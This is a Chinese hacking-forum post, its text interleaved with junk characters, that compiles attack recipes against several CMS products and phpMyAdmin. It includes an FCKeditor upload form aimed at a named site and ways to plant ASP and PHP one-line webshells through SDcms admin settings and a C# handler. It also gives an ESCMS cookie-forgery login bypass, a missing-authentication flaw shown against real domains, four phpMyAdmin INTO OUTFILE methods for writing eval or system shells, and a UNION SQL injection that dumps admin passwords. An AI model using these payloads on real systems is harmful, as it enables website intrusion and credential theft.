. R: c- j8 ^% I1 O<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">4 a- N1 I/ a+ F1 E$ m, w
Upload a new file:<br>( }1 `& n$ P! ?5 Y9 m) ~ w! g
<input type="file" name="NewFile" size="50"><br>
+ X% F3 K. }# e- j3 I" e<input id="btnUpload" type="submit" value="Upload">
3 }% f' t2 K" s) i$ i6 g</form>
$ E: m- g7 q5 d! O- [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 w5 B- G+ s$ W, u P( W" Y2 s& D! @8 F* g
SDcms 后台拿webshell
# Y! x" V% Z6 q5 ], S# k7 Z
1 y' d$ x) \& }$ J0 I( H第一种方法:
1 b- d& q6 w/ E0 Z/ u进入后台-->系统管理-->系统设置-->系统设置->网站名称;& k9 a; R- ^ M, z; n, ?& a: W& y
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx) p+ p0 ~2 v2 T
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
' i4 n5 u/ h' u6 D0 a4 Q4 C第二种方法:
/ t! B# s% |) ~* L- q6 m进入后台-->系统管理-->系统设置-->系统设置->上传设置;
; V: o$ w8 V0 N: V! D8 o3 ^在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!" P, O2 M8 k$ V
第三种方法:
1 k! v! f5 J* V进入后台-->界面管理-->模板文件管理-->创建文件
: q( k5 |$ R; z8 M. D文件名写入getshell.ashx. U+ x# R8 L8 l$ \; w" W7 x
内容写入下面内容:
5 k: v/ r) o7 o/ ^8 b9 e9 o/====================复制下面的=========================/
1 T: p6 `+ E) j<%@ WebHandler Language="C#" Class="Handler" %>
! a3 D' h( f& b" |" [8 |using System;' X. C* ^" i4 k7 ?3 [4 I
using System.Web;1 j+ I" u, M6 C! Y: Z; D: L
using System.IO;- h3 a2 D2 p; b. B2 R
public class Handler : IHttpHandler {
6 [; j8 t) {1 upublic void ProcessRequest (HttpContext context) {
1 X* H8 a* s4 _. Ocontext.Response.ContentType = "text/plain";
+ `/ _- D! A1 f9 A9 NStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
+ u5 O% b. j9 `! h" B" K$ H* } Pfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
2 T0 g$ b }) d& m d1 Q- Pfile1.Flush();2 _. E, C" e/ z1 Z6 ?* n. k9 w/ D
file1.Close(); G) R! ^8 ^$ U& E& {2 }: b# z
}7 y) _8 C! v) u* `5 O' u
public bool IsReusable {3 O$ Y9 V* H5 i# \2 n8 M( @6 _: P
get {. p; \& N" Y& w' b9 h; C/ s
return false;
( @5 G' v7 A% C! D* R}
: }! i5 ^: i4 U' [6 i3 s2 S& Z}, K9 k2 @' M# d5 j
}
4 x- c- M0 f* k/ k8 ]- J1 m4 ^/=============================================/2 H0 X; q7 [, Z G4 j$ [* N5 m
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
1 @ E: u' F6 W4 I/ f r会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
# I; P2 H6 q* n! ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 N. h* G* o% O
: l4 c$ O1 M) i+ l z2 SESCMS网站管理系统0day
4 B# s8 ~0 G; _, D) M" ~+ F' K% E* Q J* L
后台登陆验证是通过admin/check.asp实现的
3 h4 L" ^; c. v2 @6 X2 H
9 m$ I1 t" F. d# t; w. i首先我们打开http://target.com/admin/es_index.html1 D$ Z- V7 F8 F
然后在COOKIE结尾加上
& j f O+ Z9 B' m3 T6 |( T" K: R; ESCMS$_SP2=ES_admin=st0p;* X# D# ~4 M) l' X
修改,然后刷新0 X; Y, x: C+ S% x+ J
进后台了嘎..
0 G4 [) v5 e# c然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL' _ I1 W* v6 v- s5 ?* Y# w6 O: G; t
9 h! P& F3 }# `9 ^) D4 N利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
4 \: |; `/ ?- s! n& I2 O; v6 ~嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
. m# J6 u$ m6 D5 Q9 X+ s存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
2 {& j5 h# {* g3 R. l4 ~3 C' u在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
: g+ {8 L5 E, J0 s! h D! `! t' |+ P/ i------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! H* V" y2 | T( p5 z# f9 E, [4 ~- W+ w! A2 b
宁志网站管理系统后台无验证漏洞及修复
1 F, G [( C0 _+ {0 N1 D+ l( c1 }9 p
网上搜了一下,好像没有发布.如有雷同纯粹巧合!/ w6 b) m$ Y1 O1 m* d
官方网站:www.ningzhi.net0 T- F5 M: {$ S6 a' X+ v
学校网站管理系统 V.2011版本
8 i+ v0 g3 Z- |2 O0 @: {http://down.chinaz.com/soft/29943.htm
$ U) U: K1 Q R: J! E2 y其它版本(如:政府版等),自行下载.
2 G$ w' r; @1 ~' F- I% `漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~4 I' R, |2 N( k5 K
login.asp代码如下:
6 K0 u3 u) R. W) C' o! m+ E) t' g<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
- Z1 r! j/ X5 imanage.asp代码我就不帖出来了.反正也没验证.
* g# X7 C6 b J8 `: t+ {; `只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!$ n- h9 {+ d1 v& z+ H8 R
漏洞利用:" c9 g' M5 e& p$ R( ~" `+ F, f, {
直接访问http://www.0855.tv/admin/manage.asp
3 k3 @& H1 s: g7 d数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5 w# x# n- S9 M2 b1 ]7 c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ ~8 I2 d: I9 K# v3 Z/ g" z
% C9 X. q4 V! |# K% Yphpmyadmin拿shell的四种方法总结及修复- ?0 k8 Z% @/ e8 R# g; M& q* y
3 P& [" y! Z# g% P- W G( n* M
方法一:; b. ^7 L" h4 S( \
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );3 m, u& B1 s& @+ V
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
* T, |9 b* B# F2 z4 v/ \& MSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';8 ], x5 m$ F+ }2 _ Z* H
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php; G$ P) @9 k/ d }
一句话连接密码:7on" p9 c( M: P" j* z
方法二:8 C1 Z% d) [7 V- C/ u
读取文件内容: select load_file('E:/xamp/www/s.php');2 j! q9 S1 e0 {3 R5 W
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
9 R8 ?9 ?, O. a! G( Lcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'* V% S7 F9 } ^6 L
方法三:8 k. b' n4 O; k6 B! L& C
JhackJ版本 PHPmyadmin拿shell; n0 O) M" D, M& P, T4 b( v
Create TABLE study (cmd text NOT NULL);/ j4 i4 e0 O5 r
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
9 ~' `+ j: c0 B" q4 x7 N- l9 aselect cmd from study into outfile 'E:/wamp/www/7.php';% Q( r) M( r1 S7 M, }" A6 ?& w8 f
Drop TABLE IF EXISTS study;
) Z q- `; Q! l9 v$ \<?php eval($_POST[cmd])?>* d! i9 S0 T" }7 g- R c. V) B
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。$ ^/ W2 M ?/ J' _, W
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1" w0 f* N, Z6 I; j5 S1 [* c
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
8 c, j, E+ o7 N( p4 vDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
3 v% w. ]6 t# V) l0 T方法四:. n' ?" q- c' }$ J! j
select load_file('E:/xamp/www/study.php');
6 P+ M, W, T+ l& P- B; O; hselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
: r, n- S/ g, W) z然后访问网站目录:http://www.2cto.com/study.php?cmd=dir* O- c+ o. H2 k6 K+ k
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 O9 P3 g, L8 F5 b O5 {: A) Y+ q& P1 n! `# r* V( g" H
NO.001中学网站管理系统 Build 110628 注入漏洞
9 q1 N! }% L+ {, \$ `$ g& R2 i! t) m8 s, O0 U% |- R3 j1 y
NO.001中学网站管理系统功能模块:
6 N% U7 C1 ^( V/ `1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等+ ~ y1 Y* t1 Y) X! S3 f0 O! d
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
) g5 y+ H4 n# ~* ~! o; a- h3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
, _0 a9 i1 \/ Y2 U4 }4 ]2 N4.视频图片管理:一级分类,动态添加视频或者图片等信息
; V) A' U+ d) O v/ N% l5.留言管理:对留言,修改,删除、回复等管理
% C5 y0 r$ V+ \- z. C4 x6.校友频道:包括校友资料excel导出、管理等功能
* m, z; c I( ~( T, i7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( G. r1 R4 d% D- b- i3 ?默认后台:admin/login.asp* `( L+ D: h3 G6 |! ?8 ^4 L" H* h
官方演示:http://demo.001cms.net
6 ~! i9 u0 L7 Q$ L5 L2 m: s1 a源码下载地址:http://down.chinaz.com/soft/30187.htm, _: S) ]4 K" d+ {
EXP:
% i6 b5 |" Q+ \8 O V2 c7 B7 V* Zunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- J1 a) m; G# ~* Y1 ], @( T测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin4 H* ^2 V# G1 M% q
getshell:后台有备份,你懂的
$ }3 M3 m+ H7 N/ D" `另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。% M) C! q, P1 r* p! c' B
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对